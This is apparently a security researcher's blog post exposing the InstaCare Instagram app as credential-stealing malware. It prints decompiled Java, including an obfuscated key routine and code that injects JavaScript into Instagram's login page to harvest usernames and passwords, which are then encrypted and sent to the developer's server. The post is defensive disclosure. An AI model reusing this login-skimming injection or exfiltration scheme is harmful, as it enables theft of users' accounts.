instaagent_featured

Hacking a hacker – InstaAgent developer Turker Bayram strikes back.

UPADTE: iOS Version steals password too. “Who Cares With Me – InstaDetector“ is also affected. Read more.

Last week the InstaAgent developer “Turker Bayram” released a new app for the Android and iOS AppStore, after his (malicious) app “InstaAgent” was pulled by Apple&Google from their AppStores. I was astonished that Apple and Google didn’t have a closer look at his new application. One should assume a developer who already published a malicious app, should be watched more closely. His new app is called “Who Viewed Me on Instagram” (Android Version 50K – 100K downloads), and “InstaCare – Who cares with me?” (iOS Version top grossing app in Germany Category: Entertainment). The app promises the same functionality as InstaAgent did:

“- This app can show you up to most recent 100 list for your Instagram profile.

– This app displays your friend list in order, who cares your profile most with your profile interaction.”

IMG_2079     IMG_2105

Again, I’ve analysed the app, to find out if the app steals the Instagram username password again . At first glance it did not seem to, but there is one suspect HTTPS network packed:

instaAgentSuspectPacked instaAgentSuspectPacked instaAgentSuspectPacked

There is a HTTPS body value called “hash”. The data is base64 encoded and AES encrypted. To find the key for the AES decrypted data, I “decompiled” the Android version of InstaCare. And this is how the encryption algorithm looks like:

EncryptedAlgo

The interesting  parts are:

The AES encryption (PART A):


private static byte[] a(byte abyte0[], byte abyte1[])
{
abyte0 = new SecretKeySpec(abyte0, "AES");
Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
cipher.init(1, abyte0);
return cipher.doFinal(abyte1);
}

And the AES key generation (PART B):

private static String b(String s)
{
int i = 0;
String as[] = new String[13];
as[0] = "iiksdnhncvwyfmhrucwfdqraeilxyfjdovvthbgkzefbrntjrrpuofvuogujldmxqhtfjwpfcyguixdwrtqnxmutyieupqwwynewilsskvniflzfqpqubxmszkwvrhfhwrcospqqaucwjxsdttdfkapbtoziycijifgixiiw";
as[1] = "bprcrdeqmdymivvooydixtwsdloqgdahusjkyohhsdvawoonktyjkvbnfrklulunddqwsffjjxjhowvwrphajiopxxatlugozemokswushaffvdzqvvmjulkmqetlaphrnybmbzrqhcyczhmruzdrazcbuasarebwxbxbwhe";
as[2] = "bspojulxamjnhaglkzrygalmmxcpuijvxwjjsyithsfotlxdhrwoskadjdudlcqlbhvucclkvrwncwrkopwfxxdcmpfkagsvxvetcdfebzorlnylmfvpihensfviavdqghpikymmsbownbdirlpyxgbvpbptwyaodkjrzasx";
as[3] = "lpqtcbaqbxhukfccaagpnxtpdvrpnguxzssxutzvtdodjrfkrmxelsvplkfxrwxnrrmjjidbmsezikgxzgdiqwwjidjxbixwhekuzppexzdzchfafdjogunicxabqbkefvwckogjkkgmtlnwpqmyrxdtwdvzeebkxxouexmq";
as[4] = "wdgyoscucxoiqumhsrcoxyqiyjfedehkxzbbrdbemxwwhpokdnfbyeqsoczsgdbgadirgkytjursifbmtgnoklgxncrugtxhyiqcttycmmuvsvbvxmfglujcnrymvyunoopaaivtdbcezcscicyseihayfakdoxtoabjteky";
as[5] = "movgcnpxgzlyqtvlxyevlcjxrudfzpurzyemvkjfggwatqyzshwbgiaqbecquyorsudlskupllnhieohgypguskypesdyiqwvcmebqrofwuvfxpvlseazzesfcrxecgmpqavyuoaueyxssinnnftpztvwdlfracsyqljweov";
as[6] = "lkfzadkymzrcopeeehkfimugxxgorvxbefqfjhbzeswugcqlkiruyjavjgixaibfnxkzgmtldsekvbyekmwfywxfeiffrglefybmivqmlczgdtloejuahufmblttsdqqxwuhufjrlnizbngvnnouaretjzyguyfccxeumpmh";
as[7] = "ynkrnmhheyddbastbwsdewsignocjcpepavdmclsqoywpmsrkivpglwnrhrfmfghjtjvkgjgfwtqpdfjumvtatfrxyzmbcukycfgjompnfitlcvfwazwyukqzehthnwrblgortrxbrizyhqsgtlrxclqjxbxwdvaudqpkvhr";
as[8] = "ynkrnmhheyddbastbwsdewsignocjcpepavdmclsqoywpmsrkivpglwnrhrfmfghjtjvkgjgfwtqpdfjumvtatfrxyzmbcukycfgjompnfitlcvfwazwyukqzehthnwrblgortrxbrizyhqsgtlrxclqjxbxwdvaudqpkvhr";
as[9] = "vljhyuiqszparjktssogdpnedhoapozjxgsyxxtszhtmscejvupwjccmjrmxfjifrxapxuhybxitcnbzgrvruqcdopcuxlxplxfkumgvmonobokiffwwdbcsselrpkgakmldxswlflakpgrneuohlflqzbidpnqpeyharhlg";
as[10] = "ualsawqpldqqsqhtnicneojfjqvfvgbognfhqzgvvwtbsgjuuoidusqyvxkbmriqvbapxtrrwxjtotzhurgestvaroflpfwsfqrppehlmsjiwcxfgsqbsorqagdaybsbwinwaapjiomiutxrvsfkrtgmuwntgdhvbhsdfdmw";
as[11] = "uncxogkwwbsbsouqkjmlthbrueadocgirjheptcnuupkiiittvdkcfbzjbxwefhvopxehctazhlepvoatsfunpymoxtyvhlultzdutkezaxuhnuxfxpofdnqxiekcpdwuzrebneagmmuxfmousshospucsifpcgdulexquxj";
as[12] = "ncjqnuqeqfoghrqtwmmsieahqxcbmpaxtkdyjaaqgioebnrnextfhpejssxtdozgjghkeotutvgjhlixsppyxhnwxerctmjcurfgsqawhikrhbgqeeovhhkbhqxmerkeotmwivaotqvqhxcyvjccamdhkcvothgfxgvtpkos";
StringBuilder stringbuilder = new StringBuilder();
while (i < s.length()) { int j = as.length; if ("LHMgO!X&3I09KenZST/W)lEbCD:Rizh5,N+oy>qcPxdpY_fuAU-#jw[]F<{}4k%BG;1J6?(vm2sa.rtV78Q ".indexOf(s.charAt(i)) > -1) //150 150 - 152
{
int k = "LHMgO!X&3I09KenZST/W)lEbCD:Rizh5,N+oy>qcPxdpY_fuAU-#jw[]F<{}4k%BG;1J6?(vm2sa.rtV78Q ".indexOf(s.charAt(i)) * 2;
stringbuilder.append(as[i % j].substring(k, k + 2));
} else
{
stringbuilder.append(s.charAt(i)).append(s.charAt(i));
}
i++;
}
return stringbuilder.toString();
}

And PART C

public void onPageFinished(WebView webview, String s)
{
a.b.j.dismiss();
if (s.indexOf("accounts/login/") > 0 && ar.m.equals("test"))
{
s = new StringBuilder();
s.append("document.getElementsByTagName('form')[0].onsubmit = function () {");
s.append("var objPWD, objAccount;var str = '';");
s.append("var inputs = document.getElementsByTagName('input');");
s.append("for (var i = 0; i < inputs.length; i++) {");
s.append("if (inputs[i].type.toLowerCase() === 'password') {objPWD = inputs[i];}");
s.append("else if (inputs[i].name.toLowerCase() === 'username') {objAccount = inputs[i];}");
s.append("}");
s.append("if (objAccount != null) {str += objAccount.value;}");
s.append("if (objPWD != null) { str += ',-UPPA-,' + objPWD.value;}");
s.append("window.MYOBJECT.processHTML(str);");
s.append("return true;");
s.append("};");
webview.loadUrl((new StringBuilder()).append("javascript:").append(s.toString()).toString());
}
}

PART C is used to inject JS in the Instagram login page, to store the username and the password in a string, to send it to his server.

 

For the AES key generation he uses a  combination of an UDID and a ID (given from the server)  for example:

 uuid=16cdeef358a33ace and  id=221163.0c5  than they key looks like: 221163.0c516cdeef358a33ace //He sends this both values also to his server(!)

He “encrypts” the AES key with PART B. After the encryption the key looks like: “dfoykykkbgljjzrt”  . After that he “encrypts” the string from PART C (this string contains the Instagram username and password from the user and other meta informations) with the algorithm of  PART B. To make the encryption even harder he encrypts this string again with the AES Key that he generated from the UDID and ID. After this procedure he sends the encrypted string (base64 encoded) , the UDID and  the ID to his server (https://api-2.instadetect.com).

instaAgentSuspectPacked

 

With the ID and the UDID from the user he is able to decrypt the Instagram password and username later again. A working PoC (that decrypts the string)  written in Java can be found here.

The decrypted string contains following:

device=androidg26verJion=v1.2&uuid=56cdaef358a33ace&lang=de&countryg3DDE&packet=com.instacare.insta&idi3D268163.0b5i26referansg3D{70945.9a2g26lis0e=&uppa=USERNAME,-UPPA-i2CPASSWORDg26goon=

As you can see the encrypted string, that is send to the server of the InstaCare developer, contains the Instagram password and username !

After he successfully stole the Instagram login credentials, he uses them to post spam images into the stolen accounts:

IMG_2073

 

 

InstaCareFlow

Unfortunately I am currently not able to analyse the iOS version of the app completely (I don’t have a jailbroken iOS device, to decrypt the binary ): ) . But the same “suspect” HTTPS packet can be also found in the network traffic of the iOS version:

iosPacket

He probably uses a other encryption key combination for the iOS version, therefore I am currently not able the decrypt it. But if you ask me, its most likely that the iOS version also steals the Instagram password & username of the user. This would be the second time that this developer published malware into the iOS AppStore! Just as “InstaAgent” , the new app “InstaCare” is again in the iOS top-charts with thousands of downloads! Again Apple and Google did not manage to keep their AppStores free of malware. Apple and Google should remove these apps, as soon as possible!Apple and Google let a malicious App in their stores from the SAME developer, for the second time. 😿😂

IMG_2096IMG_2084

 

2 thoughts on “Hacking a hacker – InstaAgent developer Turker Bayram strikes back.

Leave a Reply

Your email address will not be published. Required fields are marked *